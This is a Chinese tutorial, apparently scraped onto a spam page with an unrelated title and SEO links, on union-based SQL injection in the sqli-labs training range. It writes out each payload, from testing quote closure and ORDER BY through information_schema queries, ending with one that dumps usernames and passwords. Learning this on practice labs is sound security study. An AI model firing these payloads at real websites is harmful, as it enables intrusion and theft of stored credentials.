中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當前位置: 首頁 > news >正文

如何做電子書網(wǎng)站全網(wǎng)營銷系統(tǒng)是不是傳銷

如何做電子書網(wǎng)站,全網(wǎng)營銷系統(tǒng)是不是傳銷,可視化網(wǎng)站建設(shè)軟件,上海在線做網(wǎng)站目錄 注入類型 判斷字段數(shù) 確定回顯點 查找數(shù)據(jù)庫名 查找數(shù)據(jù)庫表名 查詢字段名 獲取想要的數(shù)據(jù) 以sqli-labs靶場上的簡單SQL注入為例 注入類型 判斷是數(shù)字類型還是字符類型 常見的閉合方式 ?id1、?id1"、?id1)、?id1")等,大多都是單引號…

目錄

注入類型

判斷字段數(shù)

確定回顯點

查找數(shù)據(jù)庫名

查找數(shù)據(jù)庫表名?

查詢字段名

獲取想要的數(shù)據(jù)?


以sqli-labs靶場上的簡單SQL注入為例

注入類型

判斷是數(shù)字類型還是字符類型

常見的閉合方式

?id=1'、?id=1"、?id=1')、?id=1")等,大多都是單引號、雙引號、括號的組合。

先嘗試下字符型輸入:?id=1'and 1=1#或者?id=1'and 1=1--+

(如果是字符型,可以用#或者--+或者%23注釋掉單引號)

如果?id=1沒有回顯,那么輸入?id=1 or 1=1(數(shù)字型)那么肯定會回顯,輸入?id=1' or 1=1--+(字符型)也肯定會回顯(過濾字符可能不是--+,也可能是別的),但是用?id=1 and 1=1,或者?id=1' and 1=1--+不一定回顯

99b4d6248638416f95196bb67e0dd04e.png

再試下:?id=1' and 1=2--+?

541f7988e63143e385c3517388ef4e3d.png

沒有回顯?

證明是字符型輸入,

回顯是指頁面有數(shù)據(jù)信息返回。無回顯是指根據(jù)輸入的語句,頁面沒有任何變化或者沒有數(shù)據(jù)庫中的內(nèi)容顯示到網(wǎng)頁中。

如果是數(shù)字型輸入,那么就可以正常輸入:1

如何判斷是字符型還是數(shù)字型呢,有一種方法:

數(shù)字型:

  • 1 and?1=1? //能回顯
  • 1 and 1=2? //不能回顯

字符型:

  • 1' and 1=1#? //能回顯
  • 1' and 1=2#? ?//不能回顯

判斷字段數(shù)

判斷字段數(shù) order by

分四次輸入:1' and 1=1 oder by 1--+? ?1' and 1=1 oder by 2--+??1' and 1=1 oder by 3--+? ? 1' and 1=1 oder by 4--+

前兩次都是正常回顯,第三次報錯,顯示沒有第三列,說明只有兩個字段?61430bc38607457b99919a045eeb358c.png

?

確定回顯點

輸入:1' and 1=1 union select 1,2,3--+

a92613936d9846a4be8f648c23b1e987.png

發(fā)現(xiàn)1,2,3三個數(shù)沒有一個回顯,

因為第一個查詢語句把后面的給擋住了,所以要把第一個查詢語句失效

可以輸入:1' and 1=2?union select 1,2,3--+? 或者-1' union select 1,2,3--+

8af68d2db4ae452ea2409da9b5439198.png

2,3的位置成功回顯 。2,3都可以是注入點?

?

就是可以更改這些點對應(yīng)的相對的輸入位置可以得到不同的輸出;

查找數(shù)據(jù)庫名

輸入:-1'?union select 1,2,database()--+

c074e8e5d02944a5b781f5f58df6c6bd.png

?得到對應(yīng)的數(shù)據(jù)庫名字:security

查找數(shù)據(jù)庫表名?

849da3c5efd44846912a2cc425bae928.png

?輸入:-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

fc5a70c29ad24eb2ba38ac65b691832a.png

得到表名:emails,但是在這個數(shù)據(jù)庫中可能不止一個表,所以我們要得到所有表,而不只是一個emails表

輸入:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在mysql的關(guān)聯(lián)查詢或子查詢中,函數(shù) group_concat(arg) 可以合并多行的某列(或多列)數(shù)據(jù)為一行,默認以逗號分隔。

所以我們可以將tables表里面的所有tables_name表名合并成一行輸出?

c55d5e0d9a7d4332a16fde4f268accb8.png

?顯然我們想要的是users表

查詢字段名

我們會用到上面圖片中的column表

輸入:-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

ea6eca5c7693439697826c4bd98faa22.png?7f982a26658f4723bc8ff2000e9e8a92.png

users表下的字段數(shù)很多,顯然易見,我們想要獲取的只是賬號密碼,所以,對我們有用的是username和password字段

獲取想要的數(shù)據(jù)?

輸入:-1' union select 1,2,group_concat(username,'-',password) from users --+

?ceceeb0f55d746e288b39f2ca349d448.png

成功得到對應(yīng)的賬號密碼?

?

http://www.risenshineclean.com/news/65627.html

相關(guān)文章:

  • 南京網(wǎng)站制作有限公司網(wǎng)站交易網(wǎng)
  • 做ppt找圖片在哪個網(wǎng)站重慶seo代理
  • 微信平臺的微網(wǎng)站怎么做網(wǎng)站關(guān)鍵詞優(yōu)化培訓(xùn)
  • 網(wǎng)站上的鏈接怎么做的有哪些搜索引擎網(wǎng)站
  • 網(wǎng)站建設(shè)演示ppt搜索引擎營銷ppt
  • 網(wǎng)站擁有權(quán)亞馬遜seo推廣
  • 公司公司網(wǎng)站建設(shè)公司平臺推廣銷售話術(shù)
  • 網(wǎng)站統(tǒng)計源碼google關(guān)鍵詞seo
  • 長沙做網(wǎng)站的公司有哪些百度代運營
  • 贛州seo快速霸屏短視頻優(yōu)化
  • 購物幫–做特惠的導(dǎo)購網(wǎng)站磁力bt種子搜索神器
  • 網(wǎng)站不能粘貼怎么做全國各城市疫情高峰感染進度
  • 17網(wǎng)站一起做網(wǎng)店普寧池尾雅晨做外貿(mào)有哪些網(wǎng)站平臺
  • 怎么做網(wǎng)站和服務(wù)器嗎百度網(wǎng)絡(luò)營銷中心
  • 微信高端網(wǎng)站建設(shè)中國國家培訓(xùn)網(wǎng)官網(wǎng)
  • 北京網(wǎng)站優(yōu)化步驟百度電腦版下載官方
  • 衡水精品網(wǎng)站建設(shè)報價seo網(wǎng)站快速排名
  • 做一個網(wǎng)站需要多久網(wǎng)絡(luò)推廣崗位職責(zé)和任職要求
  • 做訂餐網(wǎng)站數(shù)據(jù)庫應(yīng)該有哪些表edm營銷
  • 合江做網(wǎng)站網(wǎng)推廣公司
  • 油金地 做網(wǎng)站品牌推廣營銷平臺
  • 音樂盒的網(wǎng)站怎么做代寫稿子的平臺
  • 深圳建站公司模板網(wǎng)絡(luò)營銷公司排行
  • 怎么制作app網(wǎng)站千萬不要去電商公司上班
  • 制作網(wǎng)站公司年收入多少百度指數(shù)關(guān)鍵詞未收錄怎么辦
  • 平安做計劃書的網(wǎng)站人力資源培訓(xùn)
  • 網(wǎng)站建設(shè)公司專業(yè)的建站優(yōu)化公司百度seo怎么優(yōu)化
  • 每月網(wǎng)站流量網(wǎng)絡(luò)營銷常用的工具
  • 加關(guān)鍵詞的網(wǎng)站石家莊網(wǎng)站seo外包
  • 上海網(wǎng)站企業(yè)軟文推廣是什么